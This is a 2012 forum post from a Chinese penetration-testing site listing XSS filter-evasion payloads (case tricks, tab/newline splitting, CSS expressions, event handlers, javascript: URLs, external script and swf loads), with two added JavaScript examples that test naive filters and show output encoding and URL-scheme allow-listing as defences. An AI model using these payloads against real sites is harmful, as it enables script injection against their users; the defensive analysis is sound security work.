中国网络渗透测试联盟

Title: Cross Site Scripting (XSS) attack techniques

Author: admin    Time: 2012-12-31 09:59
1. Change the letter case

    <sCript>alert('d')</scRipT>

2. Add extra characters to evade regular-expression checks

    <<script>alert('c')//<</script>

    <SCRIPT a=">" SRC="t.js"></SCRIPT>

    <SCRIPT =">" SRC="t.js"></SCRIPT>

    <SCRIPT a=">" '' SRC="t.js"></SCRIPT>

    <SCRIPT "a='>'" SRC="t.js"></SCRIPT>

    <SCRIPT a=`>` SRC="t.js"></SCRIPT>

    <SCRIPT a=">'>" SRC="t.js"></SCRIPT>

3. Use another extension instead of .js

    <script src="bad.jpg"></script>

4. Put the JavaScript inside a CSS file

    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

       example:

          body {
               background-image: url('javascript:alert("XSS");')
          }

5. Insert other characters inside the script tag

    <SCRIPT/SRC="t.js"></SCRIPT>

    <SCRIPT/anyword SRC="t.js"></SCRIPT>

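The tag variants in sections 1, 2, 3 and 5 all target filters that look for one spelling of `<script>`. The following is an added example (not code from the original post) that runs a handful of the post's own payloads through a naive strip-the-tag regex and through context-aware HTML output encoding, and reports which defence still leaves a script tag behind. `t.js` and `bad.jpg` are the post's placeholder file names; the payload list and the `containsScriptTag` heuristic are constructed for this example.

```javascript
// Added example (not from the original post): why a blocklist regex fails on
// the script-tag variants listed in sections 1, 2, 3 and 5, and why
// context-aware output encoding does not.

// Naive defence: strip bare <script> / </script> tags, case-insensitively.
function naiveStripScript(input) {
  return String(input).replace(/<\/?script>/gi, "");
}

// Hardened defence for an HTML text or quoted-attribute context: encode the
// characters that can change the parser's state, so "<" never reaches the
// tokenizer as markup. (Does not cover URL, CSS or JavaScript contexts.)
const HTML_ESCAPES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;",
};
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Rough detector for "a script start tag is still present": "<script"
// followed by whitespace, "/" or ">", in any letter case.
function containsScriptTag(html) {
  return /<script[\s\/>]/i.test(html);
}

// Payloads copied from the post (constructed test inputs).
const PAYLOADS = [
  "<sCript>alert('d')</scRipT>",          // section 1: letter case
  '<SCRIPT a=">" SRC="t.js"></SCRIPT>',   // section 2: extra attribute text
  '<script src="bad.jpg"></script>',      // section 3: non-.js extension
  '<SCRIPT/SRC="t.js"></SCRIPT>',         // section 5: "/" instead of a space
];

// For each payload, report whether a script tag survives each defence.
function evaluateDefences(payloads = PAYLOADS) {
  return payloads.map((p) => ({
    payload: p,
    survivesNaive: containsScriptTag(naiveStripScript(p)),
    survivesEscape: containsScriptTag(escapeHtml(p)),
  }));
}
```

Calling `evaluateDefences()` shows the pattern a defender should expect: the case-insensitive strip happens to catch the section 1 payload, but every variant that carries an attribute, a `/` or a differently spelled closing tag survives it, while the encoded output never contains a parseable tag. Encoding for the output context, rather than pattern-matching the input, is the defence that generalises.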
6. Use a tab or a newline to evade

    <img src="jav ascr ipt:alert('XSS3')">

    <img src="jav ascr ipt:alert('XSS3')">

    <IMG SRC="jav ascript:alert('XSS');">

         -> tab

         -> newline

7. Use "\" to evade

    <STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

    <IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

    <IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

8. Use hex encoding to evade (the ";" may also be dropped)

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

        original source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

        original source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

9. Script in an HTML tag

    <body onload="alert('onload')">

        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. XSS code contained in a swf

    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code and reassemble it.

    <XML ID=I><X><C>
    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
    </C></X>
    </xml>

    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

    <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. Use HTML+TIME.

    <HTML><BODY>
    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
    <?import namespace="t" implementation="#default#time2">
    <t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">
    </BODY></HTML>

13. Write a cookie via META.

    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. JavaScript in src, href, url

    <IFRAME SRC=javascript:alert('13')></IFRAME>

    <img src="javascript:alert('XSS3')">

    <IMG DYNSRC="javascript:alert('XSS20')">

    <IMG LOWSRC="javascript:alert('XSS21')">

    <LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

    <IFRAME SRC=javascript:alert('XSS27')></IFRAME>

    <TABLE BACKGROUND="javascript:alert('XSS29')">

    <DIV STYLE="background-image: url(javascript:alert('XSS30'))">

    <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}
    </STYLE><A CLASS=XSS></A>

    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

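The `src`/`href`/`url` payloads in section 14, combined with the case change of section 1 and the tab/newline trick of section 6, succeed because browsers normalise a URL before reading its scheme, while a naive check looks at the raw string. The following is an added example (not code from the original post) that contrasts an exact-prefix blocklist with a check that first mirrors the browser's normalisation and then allow-lists the scheme. The allow-list contents, the `example.com` URL and the test inputs are assumptions constructed for this example.

```javascript
// Added example (not from the original post): the src/href/url payloads in
// sections 6 and 14 rely on the browser tolerating letter-case changes and
// embedded tab/newline characters in the scheme. A check on the raw string
// misses them; normalising first and then allow-listing the scheme does not.

// Naive defence: reject only an exact, lowercase "javascript:" prefix.
function naiveIsSafeUrl(url) {
  return !String(url).startsWith("javascript:");
}

// Mirror what the URL parser does before the scheme is read: remove ASCII
// tab/newline anywhere, strip leading C0 controls and spaces, fold case.
function normalizeForSchemeCheck(url) {
  return String(url)
    .replace(/[\t\n\r]/g, "")
    .replace(/^[\x00-\x20]+/, "")
    .toLowerCase();
}

// Schemes acceptable in an href/src for this example (assumption).
const ALLOWED_SCHEMES = new Set(["http", "https", "mailto"]);

// Allow-list check: anything that parses as a scheme must be on the list;
// relative URLs (no scheme) pass. Unknown or malformed schemes are rejected
// rather than guessed at.
function isSafeUrl(url) {
  const cleaned = normalizeForSchemeCheck(url);
  const colon = cleaned.indexOf(":");
  if (colon === -1) return true;                   // relative URL, no scheme
  const delim = cleaned.search(/[\/?#]/);
  if (delim !== -1 && delim < colon) return true;  // ":" is in path/query, not the scheme
  return ALLOWED_SCHEMES.has(cleaned.slice(0, colon));
}

// Constructed test inputs based on the post's payloads.
const URLS = [
  "javascript:alert('XSS3')",          // section 14, as written
  "jav\tascr\nipt:alert('XSS3')",      // section 6: tab and newline inside the scheme
  " \u0001javascript:alert('XSS')",    // leading space and control character
  "JavaScript:alert('XSS')",           // section 1 idea applied to the scheme
  "https://example.com/xss.css",       // benign absolute URL
  "/images/a.jpg",                     // benign relative URL
];

// Side-by-side verdict of both checks for each URL.
function compareChecks(urls = URLS) {
  return urls.map((u) => ({
    url: u,
    naive: naiveIsSafeUrl(u),
    hardened: isSafeUrl(u),
  }));
}
```

`compareChecks()` shows the naive check passing every variant except the literal lowercase one, while the hardened check rejects all four and still accepts the benign URLs. Two caveats for real deployments: this only covers URL-valued attributes, so attributes such as `STYLE` and the legacy `DYNSRC`/`LOWSRC` should simply never be populated from untrusted input, and the value still needs HTML attribute encoding when it is written into the page.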

Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2